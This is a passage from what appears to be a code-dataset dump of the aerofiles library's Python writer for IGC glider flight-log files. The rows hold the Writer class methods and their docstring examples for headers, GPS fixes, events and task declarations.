pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_gps_datum | python | def write_gps_datum(self, code=None, gps_datum=None):
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
) | Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L222-L251 | [
"def write_fr_header(self, subtype, value,\n subtype_long=None, value_long=None):\n self.write_header(\n 'F', subtype, value,\n subtype_long=subtype_long, value_long=value_long\n )\n"
] | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_headers | python | def write_headers(self, headers):
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club']) | Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written. | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L348-L438 | [
"def write_pilot(self, pilot):\n \"\"\"\n Write the pilot declaration header::\n\n writer.write_pilot('Tobias Bieniek')\n # -> HFPLTPILOTINCHARGE:Tobias Bieniek\n\n :param pilot: name of the pilot\n \"\"\"\n self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')\n",
"def wri... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
